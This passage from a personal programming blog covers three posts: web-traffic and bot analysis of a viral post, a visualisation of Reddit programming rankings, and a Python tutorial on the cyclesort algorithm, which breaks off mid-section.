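        hostname, _aliases, _addrs = socket.gethostbyaddr(ip)
        return hostname
    except OSError:
        return "unidentified bot"
```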
<style>
.soctable td {
padding-left: 0 !important;
}
</style>
<table class="soctable">
<tr>
<th>minutes after publication</th>
<th>bot</th>
</tr>
<tr>
<td rowspan="10">1</td> <td><a href="http://twitter.com">Twitter</a></td>
</tr>
<tr>
<td><a href="http://www.google.com/bot.html">Google</a></td>
</tr>
<tr>
<td><a href="http://www.jaxified.com/crawler">Jaxified</a></td>
</tr>
<tr>
<td><a href="http://njuice.com/">NJuice</a></td>
</tr>
<tr>
<td><a href="http://www.linkedin.com">LinkedIn</a></td>
</tr>
<tr>
<td><a href="http://www.postrank.com/">PostRank</a></td>
</tr>
<tr>
<td>Unidentified bot from a Microsoft-owned IP</td>
</tr>
<tr>
<td><a href="http://help.yahoo.com/help/us/ysearch/slurp">Yahoo! Slurp</a></td>
</tr>
<tr>
<td>Unidentified bot from a <a
href="http://www.bbc.co.uk/blogs/rad/">BBC RAD labs</a> IP.
</td>
</tr>
<tr>
<td><a href="http://www.oneriot.com/">OneRiot</a></td>
</tr>
<tr>
<td rowspan="4">2</td> <td><a href="http://friendfeed.com/about/bot">FriendFeed</a></td>
</tr>
<tr>
<td><a href="http://www.kosmix.com/">Kosmix</a></td>
</tr>
<tr>
<td><a href="http://labs.topsy.com/butterfly/">Topsy Butterfly</a></td>
</tr>
<tr>
<td>Unidentified bot from <a href="http://marban.com">marban.com</a> subdomain. (PoPUrls?)</td>
</tr>
<tr>
<td rowspan="2">3</td> <td><a href="http://metauri.com/">metauri.com</a></td>
</tr>
<tr>
<td><a href="http://search.msn.com/msnbot.htm">msnbot</a></td>
</tr>
<tr>
<td rowspan="2">6</td> <td><a href="http://summify.com">Summify</a></td>
</tr>
<tr>
<td>Bot identifying itself just as "NING", can't confirm that it's <a
href="http://www.ning.com/">the Ning</a>. </td>
</tr>
<tr>
<td>9</td> <td><a href="http://tineye.com/crawler.html">tineye</a></td>
</tr>
<tr>
<td>26</td> <td><a href="http://spinn3r.com/robot">spinn3r.com</a></td>
</tr>
<tr>
<td>27</td> <td><a href="http://www.backtype.com/">backtype.com</a></td>
</tr>
<tr>
<td>47</td> <td><a href="http://www.facebook.com/externalhit_uatext.php">facebookexternalhit</a></td>
</tr>
</table>
<h2 id="enter-the-heavyweights-hacker-news-and-reddit">Enter the heavyweights: Hacker News and Reddit</h2>
<p>48 minutes after the post was published, the first hit from a social news site
appears: hello <a href="http://news.ycombinator.com">Hacker News</a>. The post
quickly makes it onto the front page, and HN traffic peaks at 399 hits per hour
in the second hour after publication. All told, the post got 2337 hits with a
HN <a href="http://en.wikipedia.org/wiki/HTTP_referrer">referrer header</a>.</p>
<div class="media">
<a href="ycombinator.png">
<img src="ycombinator.png" />
</a>
<div class="subtitle">
news.ycombinator.com
</div>
</div>
<p>Two hours and three minutes after publication, the real monster of social news
arrives: the first hit from Reddit appears. The Reddit traffic peaks in the
sixth hour after publication at 3025 hits per hour, and delivers a total of
23807 hits in the 51 hours after publication.</p>
<div class="media">
<a href="reddit.png">
<img src="reddit.png" />
</a>
<div class="subtitle">
reddit.com/r/programming
</div>
</div>
<h2 id="the-long-tail">The long tail</h2>
<p>Reddit accounted for the vast majority of the post's traffic, dwarfing all
other sources combined. In all, I received only 2300 hits with specified
referrer headers that weren't Reddit or HN. Here are all the referrers that
were responsible for more than 10 hits to the post:</p>
<table>
<tr><th>hits</th><th>site</th></tr>
<tr><th>456</th> <td><a href="http://popurls.com">popurls.com</a></td></tr>
<tr><th>359</th> <td><a href="http://www.google.com/reader">Google Reader</a></td></tr>
<tr><th>282</th> <td><a href="http://twitter.com">Twitter</a></td></tr>
<tr><th>196</th> <td><a href="http://jimmyr.com">jimmyr.com</a></td></tr>
<tr><th>183</th> <td><a href="http://delicious.com">delicious</a></td></tr>
<tr><th>153</th> <td><a href="http://pop.is">pop.is</a></td></tr>
<tr><th>139</th> <td><a href="http://www.google.com">Google Search</a></td></tr>
<tr><th>82</th> <td><a href="http://www.wired.com">wired.com</a></td></tr>
<tr><th>56</th> <td><a href="http://www.facebook.com">Facebook</a></td></tr>
<tr><th>36</th> <td><a href="http://longurl.com">longurl.com</a></td></tr>
<tr><th>36</th> <td><a href="http://glozer.net/trendy">glozer.net/trendy</a></td></tr>
<tr><th>30</th> <td><a href="http://oursignal.com">oursignal.com</a></td></tr>
<tr><th>28</th> <td><a href="http://hackurls.com">hackurls.com</a></td></tr>
<tr><th>24</th> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td></tr>
<tr><th>18</th> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td></tr>
<tr><th>15</th> <td><a href="http://dzone.com">dzone.com</a></td></tr>
<tr><th>11</th> <td><a href="http://www.freshnews.org">www.freshnews.org</a></td></tr>
</table>
<p>It's interesting to see that I got nearly 200 hits from delicious.com. By
contrast, <a href="http://pinboard.in">pinboard.in</a> - which seems to be delicious.com's
anointed successor - sent me only two hits. Then again, my post was published
in late November 2010, about a month before Yahoo <a href="http://techcrunch.com/2010/12/16/is-yahoo-shutting-down-del-icio-us/">spectacularly
hobbled</a>
their bookmarking property. I wonder what those figures would look like today.</p>
<p>The thin end of the long tail is the 200 hits from 94 sites that were
responsible for 10 or fewer hits each. We can break this motley crew up into a
few different classes:</p>
<ul>
<li>Sites that provide some sort of social news analysis, piggy-backing off HN,
Reddit and delicious.com. For example, <a href="http://popacular.com">popacular.com</a>,
<a href="http://seesmic.com">seesmic.com</a>, <a href="http://hotgrog.com">hotgrog.com</a>.</li>
<li>URL shorteners like <a href="http://j.mp">j.mp</a> and unshorteners like
<a href="http://untiny.me">untiny.me</a></li>
<li>Social media-ish services like <a href="http://friendfeed.com">FriendFeed</a>,
<a href="http://stumbleupon.com">StumbleUpon</a>, <a href="http://pinboard.in">pinboard.in</a></li>
<li>Tiny personal blogs.</li>
<li>And, surprisingly - a number of sites that just provide an alternative
interface or URL for Hacker News: <a href="http://hackerne.ws/">hackerne.ws</a>,
<a href="http://ihackernews.com/">ihackernews.com</a>,
<a href="http://hacker-newspaper.gilesb.com/">hacker-newspaper.gilesb.com</a>,
<a href="http://www.icombinator.net/">www.icombinator.net</a>.</li>
</ul>
<h2 id="robot-scavengers-of-the-social-news-ecosphere">Robot scavengers of the social news ecosphere</h2>
<p>Let's take a look at overall bot traffic, separating out our silicon friends by
looking for non-human and non-standard user-agent headers. The moment the post
hits the HN front page bot traffic spikes, and this spike continues as the post
is submitted to Reddit and starts its climb up the proggit front page.</p>
<div class="media">
<a href="robots.png">
<img src="robots.png" />
</a>
<div class="subtitle">
robots
</div>
</div>
<p>Enter the robot scavengers of the social news ecosphere - a set of second-tier
aggregators that monitor social news and Twitter for hot stories. Here's a
sample of bot visitors, taken more or less at random from the logs:</p>
<table>
<tr><td><a href="http://inagist.com">inagist.com</a></td>
<td><a href="http://www.netvibes.com">www.netvibes.com</a></td>
<td><a href="http://chattertrap.com">chattertrap.com</a></td>
<td><a href="http://twingly.com">twingly.com</a></td></tr>
<tr><td><a href="http://coder.io">coder.io</a></td>
<td><a href="http://newsmagpie.com">newsmagpie.com</a></td>
<td><a href="http://worio.com">worio.com</a></td>
<td><a href="http://www.myvbo.com">www.myvbo.com</a></td></tr>
<tr><td><a href="http://www.zemanta.com">www.zemanta.com</a></td>
<td><a href="http://embed.ly">embed.ly</a></td>
<td><a href="http://brandwatch.net">brandwatch.net</a></td>
<td><a href="http://www.flipboard.com">www.flipboard.com</a></td></tr>
<tr><td><a href="http://paper.li">paper.li</a></td>
<td><a href="http://rivva.de">rivva.de</a></td>
<td><a href="http://attribyte.com">attribyte.com</a></td>
<td><a href="http://diffbot.com">diffbot.com</a></td></tr>
<tr><td><a href="http://yoono.com">yoono.com</a></td>
<td><a href="http://hatena.net.jp">hatena.net.jp</a></td>
<td><a href="http://hourlypress.com">hourlypress.com</a></td>
<td><a href="http://longurl.org">longurl.org</a></td></tr>
<tr><td><a href="http://untiny.me">untiny.me</a></td>
<td><a href="http://goo.ne.jp">goo.ne.jp</a></td>
<td><a href="http://www.baidu.com">www.baidu.com</a></td>
<td><a href="http://sharethis.com">sharethis.com</a></td></tr>
<tr><td><a href="http://ideashower.com">ideashower.com</a></td>
<td><a href="http://pannous.info">pannous.info</a></td>
<td><a href="http://wikiwix.com">wikiwix.com</a></td>
<td><a href="http://pipes.yahoo.com">pipes.yahoo.com</a></td></tr>
<tr><td><a href="http://mustexist.com">mustexist.com</a></td>
<td><a href="http://pics.fefoo.com">pics.fefoo.com</a></td>
<td><a href="http://cyber.law.harvard.edu">cyber.law.harvard.edu</a></td>
<td><a href="http://seatgeek.com">seatgeek.com</a></td></tr>
<tr><td><a href="http://metadatalabs.com">metadatalabs.com</a></td>
<td><a href="http://moreover.com">moreover.com</a></td>
<td><a href="http://thinglabs.com">thinglabs.com</a></td>
<td><a href="http://stufftotweet.com">stufftotweet.com</a></td></tr>
<tr>
<td><a href="http://chilitweets.com">chilitweets.com</a></td>
<td><a href="http://bkluster.hut.edu.vn">bkluster.hut.edu.vn</a></td>
<td><a href="http://wikio.com">wikio.com</a></td>
<td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td>
</tr>
<tr>
<td><a href="http://zite.com">zite.com</a></td>
<td><a href="http://zelist.ro">zelist.ro</a></td>
<td><a href="http://buzzzy.com">buzzzy.com</a></td>
<td><a href="http://intravnews.com">intravnews.com</a></td>
</tr>
</table>
<p>At this point, I'd like to bitch a bit about how astonishingly badly behaved
some of the automated systems skulking around today's web are. The vast, vast
majority don't provide any clue about the responsible entity in the user-agent
string. The list above consists of responsible bots that do identify
themselves, and less responsible ones that I could identify through reverse
domain resolution. Most of the irresponsible bots come from Amazon Web
Services, which seems to be a right wretched hive of scum and villainy. The
worst performers here boggle the mind - about a dozen hosts from AWS retrieved
the blog post more than 200 times a day, all using full GET requests, without
an If-Modified-Since header, and with no identification. The arch-villain hit
the post 600 times in its first 24 hours - that's about once every 2.5 minutes.</p>
<h2 id="referrer-less-viewers-and-stealthy-bots">Referrer-less viewers and stealthy bots</h2>
<p>I was surprised to see that almost 20% of requests not identified as bot
requests had no specified referrer, a much greater percentage than I would have
anticipated. Here's a graph showing the number of referrer-less requests per
hour:</p>
<div class="media">
<a href="noreferrer.png">
<img src="noreferrer.png" />
</a>
<div class="subtitle">
requests without a referrer
</div>
</div>
<p>It looks like the double-peak in this graph coincides with the traffic peaks
from HN and Reddit. This suggests that the majority of these hits do in fact
come (perhaps indirectly) from HN and Reddit users. One possibility is that a
chunk of this referrer-less traffic comes from non-browser Twitter clients.</p>
<p>A fraction of the referrer-less traffic also comes from stealthy bots sending
user-agent strings that match those of desktop browsers. About 5% of these
requests, for example, come from the Amazon EC2 cloud, so are unlikely to be
real browsers. One Internet darling that does this is Instapaper, which seems
to use the requesting client's user-agent string rather than frankly confessing
itself to be a bot. It also appears to re-request an article in full for each
user, rather than simply checking if there's been a change and using a cached
copy. On the upside, this means that I know that 131 readers used Instapaper to
view my post.</p>
<h2 id="aftermath">Aftermath</h2>
<p>After the post drifts off the proggit and HN front pages, traffic dies down.
There's a dwindling tail of stragglers that bothered to flip through to the
second or third page of top stories, and a tiny dribble of users who discovered
the link through other sources. A month later, the post gets about 60 hits per
day, of which more than a third are from bots. Non-bot traffic is still
dominated by Reddit, presumably from people searching or idly flicking through
Reddit's history.</p>
<p>So, in the end, after my once-thrumming server quiets down, what has the
lasting effect been on my own social graph? I had a small surge of Twitter
follows, going from 230 to 245 followers. There was a minor blip of subscribers
to my RSS feed, with Google Reader reporting subscriptions going from about 510
to 551. Out of 33,000 unique visitors, 56 decided to cultivate a more permanent
relationship of some sort with my blog. That's about 1 in 600. If you remember
only one figure from this post, this should be it.</p>
A journey through the bowels of proggit
2011-01-12T00:00:00+00:00
2011-01-12T00:00:00+00:00
https://corte.si/posts/socialmedia/redditgraph/
<div class="media">
<a href="proggit4.png">
<img src="proggit4.png" />
</a>
<div class="subtitle">
proggit - 4 hours
</div>
</div>
<p>I've had a nagging sense of dissatisfaction with my information diet lately, and
it's becoming clear that over-reliance on social news sites like Reddit and
Hacker News (much as I love them) lies at the heart of my discontent. For the
past few months, I've been gathering data to help me come up with a coherent
explanation for my malaise. I'm still working on it, so this post will have no
conclusions, only repulsive metaphors and pretty pictures.</p>
<p>For a week or so in November I logged the slow, peristaltic progress of stories
through the bowels of <a href="http://www.reddit.com/r/programming">proggit</a>, watching
them get nudged this way and that by the malodorous, hot gas of public opinion
before finally being shunted on to the colon of the second page of results. In
other words, I sampled the top 25 stories every 5 minutes through the RSS feed.
One of the things I was interested in was how submission rankings changed over
time, so I visualised the dataset using the same technique I came up with to
<a href="http://sortvis.org">visualise sorting algorithms</a>. The image above shows 4
hours of proggit, with each submission represented by a line. The lines are
coloured based on the average rank the story achieves over its lifetime in the
top 25, ranging between upvote orange for top stories, and downvote blue for
bottom stories.</p>
<p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom
and pan around. The busy cut-and-thrust of life on reddit is all here. The
meteoric rise, inevitably followed by long, slow decay. The sudden, mysterious,
mid-flight disappearances. The jostling and writhing among the bottom
submissions that never quite manage to make it into the big leagues. Heady
stuff. Click to view:</p>
<div class="media">
<a href="proggit72.png">
<img src="mini72.png" />
</a>
<div class="subtitle">
proggit - 72 hours
</div>
</div>
<p>Perhaps I'll do an expanded version that lets you view submission titles, times
and so forth later on.</p>
Cyclesort - a curious little sorting algorithm
2010-11-22T00:00:00+00:00
2010-11-22T00:00:00+00:00
https://corte.si/posts/code/cyclesort/
<p>One of the nice things about building <a href="http://sortvis.org">sortvis.org</a> and
writing the posts that led up to it is that people email me with pointers to
esoteric algorithms I've never heard of. Today's post is dedicated to one of
these - a curious little sorting algorithm called
<a href="http://en.wikipedia.org/wiki/Cycle_sort">cyclesort</a>. It was described in 1990
in a <a href="http://comjnl.oxfordjournals.org/content/33/4/365.full.pdf">3-page paper by B.K.
Haddon</a>, and has
become a firm favourite of mine.</p>
<p>Cyclesort has some nice properties - for certain restricted types of data it
can do a stable, in-place sort in linear time, while guaranteeing that each
element will be moved at most once. But what I really like about this algorithm
is how naturally it arises from a simple theorem on <a href="http://mathworld.wolfram.com/SymmetricGroup.html">symmetric
groups</a>. Bear with me while
I work up to the algorithm through a couple of basic concepts.</p>
<h2 id="cycles">Cycles</h2>
<p>Let's start with the definition of a
<a href="http://mathworld.wolfram.com/PermutationCycle.html">cycle</a>. A cycle is a subset
of elements from a permutation that have been rotated from their original
position. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]</strong>, and a cycle <strong>[0,
3, 1]</strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to
1 and 1 to 0. Visually, it looks like this:</p>
<div class="media">
<a href="graph1.png">
<img src="graph1.png" />
</a>
</div>
<p>We can apply a cycle to an ordered set to obtain a permutation, and we can then
reverse that cycle to re-obtain the original set. Here's a Python function that
applies a cycle to a list in-place:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">apply_cycle</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">lst</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">c</span><span style="color:#c0c5ce;">):
</span><span style="color:#65737e;"># Extract the cycle's values
</span><span style="color:#c0c5ce;">vals = [lst[i] </span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">c]
</span><span style="color:#65737e;"># Rotate them circularly by one position
</span><span style="color:#c0c5ce;">vals = [vals[-</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]] + vals[:-</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]
</span><span style="color:#65737e;"># Re-insert them into the list
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i, offset </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">enumerate</span><span style="color:#c0c5ce;">(c):
lst[offset] = vals[i]
</span></code></pre>
<p>Here's an interactive session showing the function in action:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">>>> lst = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
>>> c = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]
>>> </span><span style="color:#bf616a;">apply_cycle</span><span style="color:#c0c5ce;">(lst, c)
>>> lst
[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
>>> c.</span><span style="color:#bf616a;">reverse</span><span style="color:#c0c5ce;">()
>>> </span><span style="color:#bf616a;">apply_cycle</span><span style="color:#c0c5ce;">(lst, c)
>>> lst
[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
</span></code></pre><h2 id="permutations">Permutations</h2>
<p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a
unique set of disjoint cycles</strong>. We can think of this as analogous to the
factorization of a number - every permutation is the product of a unique set of
component cycles in the same way every number is the product of a unique set of
prime factors. Taking this as a given, how could we calculate the cycles that
make up a permutation? One obvious way to proceed is to pick a starting point,
and simply "follow" the cycle in reverse until we get back to where we started.
We know from the result above that the element is guaranteed to be part of a
cycle, so we must eventually reach our starting point again. When we do, hey
presto, we have a complete cycle. If we keep track of the elements that are
already part of a known cycle, we can skip to the next unknown element and
repeat the process. Once we reach the end of the list we're done.</p>
<p>This scheme can only work if we know where in the ordered sequence any given
element belongs, because this is the way we find the "previous hop" in a cycle.
In the examples above, we worked with lists that consist of a contiguous range
of numbers <strong>0..n</strong>, which gives us a short-cut: the element's value <em>is</em> its
offset in the ordered list. In the code below I've factored this out into a
function <strong>key</strong>, which takes an element value, and returns its correct offset - in
this case <strong>key</strong> is simply the identity function.</p>
<p>Here's a Python function that finds all cycles in permutations of numbers
ranging from <strong>0..n</strong>:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">find_cycles</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
seen = </span><span style="color:#bf616a;">set</span><span style="color:#c0c5ce;">()
cycles = []
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]) and not i in seen:
cycle = []
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
cycle.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(n)
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[n])
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
</span><span style="color:#b48ead;">break
</span><span style="color:#c0c5ce;">seen = seen.</span><span style="color:#bf616a;">union</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">set</span><span style="color:#c0c5ce;">(cycle))
cycles.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">list</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">reversed</span><span style="color:#c0c5ce;">(cycle)))
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">cycles
</span></code></pre>
<p>Running it on our example permutation recovers the cycle we used to create it:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">>>> </span><span style="color:#bf616a;">find_cycles</span><span style="color:#c0c5ce;">([</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">])
[[</span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">]]
</span></code></pre>
<p>Here's <strong>find_cycles</strong> run on a longer, randomly shuffled list:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">>>> l = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">5</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">6</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">8</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">7</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">9</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">]
>>> </span><span style="color:#bf616a;">find_cycles</span><span style="color:#c0c5ce;">(l)
[[</span><span style="color:#d08770;">7</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">5</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">], [</span><span style="color:#d08770;">9</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">6</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">], [</span><span style="color:#d08770;">8</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">]]
</span></code></pre>
<p>And here's a handsomely colourful graphical version of the output above:</p>
<div class="media">
<a href="graph2.png">
<img src="graph2.png" />
</a>
</div>
<h2 id="a-sorting-algorithm-emerges">A sorting algorithm emerges</h2>
<p>Let's take a closer look at the <strong>find_cycles</strong> function above. We keep track of
elements that are already part of a cycle in the <strong>seen</strong> set, so that we can
skip them as we proceed through the list. The <strong>seen</strong> set can be as large as
the list itself, so we've doubled the memory requirement for the algorithm. If
we're allowed to destroy the input list, we can avoid explicitly tracking seen
elements by relocating elements to their correct position as we work our way
around each cycle. All the cycles are disjoint and we traverse each cycle only
once, so doing this won't affect the function's output. We can then tell that
we need to skip an element we've already seen by checking whether it's in the
correct sorted position. Here's the result:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">find_cycles2</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
cycles = []
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]):
cycle = []
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
cycle.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(n)
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(last_value)
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span><span style="color:#c0c5ce;">cycles.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">list</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">reversed</span><span style="color:#c0c5ce;">(cycle)))
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">cycles
</span></code></pre>
<p>But... at the end of this process, the original list is sorted! Tada: cyclesort
pops out of the shrubbery almost as a side-effect of efficiently finding all
cycles. If we're only interested in sorting, we can strip the code that saves
the cycles, which leaves us with a nice, pared-back sorting algorithm:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">cyclesort_simple</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]):
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(last_value)
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span></code></pre>
<p>The <strong>cyclesort_simple</strong> algorithm only works on permutations of sets of
numbers ranging from <strong>0</strong> to <strong>n</strong>. There are other fast ways to sort data of
this restricted kind, but all the methods I know of require additional memory
proportional to <strong>n</strong>. Cyclesort can do it without any extra storage at all,
which is a neat trick.</p>
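<p>To see these properties concretely, here's a small, self-contained sanity check of the algorithm. The <strong>writes</strong> counter is my addition, not part of the algorithm as given above - it simply tallies element placements to confirm that no element is written more than once:</p>

```python
import random

def key(element):
    # For permutations of 0..n-1, an element's value is its sorted position.
    return element

def cyclesort_simple(l):
    # In-place cycle sort, as above, instrumented to count element writes.
    writes = 0
    for i in range(len(l)):
        if i != key(l[i]):
            n = i
            last_value = None
            while True:
                tmp = l[n]
                if n != i:
                    l[n] = last_value
                    writes += 1
                last_value = tmp
                n = key(last_value)
                if n == i:
                    l[n] = last_value
                    writes += 1
                    break
    return writes

l = list(range(1000))
random.shuffle(l)
writes = cyclesort_simple(l)
assert l == sorted(l)      # the list is sorted...
assert writes <= len(l)    # ...and each element was placed at most once
```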
<h2 id="visualising-cyclesort">Visualising cyclesort</h2>
<p>At this point, we have enough information to visualise the algorithm, so let's
take a look at the beastie we're working with. I've had to make some little
adjustments to the usual sortvis.org visualisation process to cope with
cyclesort. In the algorithm above, the first element is duplicated into the
second position of each cycle, and that duplicate remains in play until it's
overwritten by the last element of the cycle. I changed the algorithm slightly
to write a null placeholder at the start of the cycle to avoid duplicates, and
taught the sortvis.org visualiser to deal with "empty" slots. The resulting
<a href="http://sortvis.org/visualisations.html">weave</a> visualisation looks like this:</p>
<div class="media">
<a href="cyclesort.png">
<img src="cyclesort.png" />
</a>
</div>
<p>This is quite satisfying - you can tell where each cycle begins and ends by the
gaps, which span each cycle exactly. It's immediately clear that the
permutation above, for instance, contained five cycles. Within each cycle, you
can follow along as each element replaces the next, until we finally close the
gap by placing the last element in the first slot.</p>
<p>The <a href="http://sortvis.org/visualisations.html">dense</a> visualisation is less
informative because the gaps are too small to see at a single-pixel width, and
the algorithm doesn't have much other large-scale structure. It still looks
neat, though:</p>
<div class="media">
<a href="cyclesort-dense.png">
<img src="cyclesort-dense.png" />
</a>
</div>
<h2 id="generalising-cyclesort">Generalising cyclesort</h2>
<p>Cyclesort works whenever we can write an implementation of the <strong>key</strong>
function, so there's quite a bit of scope for clever exploitation of structured
data. The Haddon paper presents a solution for one common case: permutations
whose elements come from a relatively small set, where the number of occurrences
of each element is known. The insight is that the <strong>key</strong> function can have
persistent state, letting us calculate the positions of elements incrementally
as we work through the list.</p>
<p>We begin by adding an extra argument to our sort function: a list of <strong>(element,
count)</strong> tuples telling us a) the order of the keys, and b) the frequency with
which each key occurs.</p>
<pre style="background-color:#2b303b;">
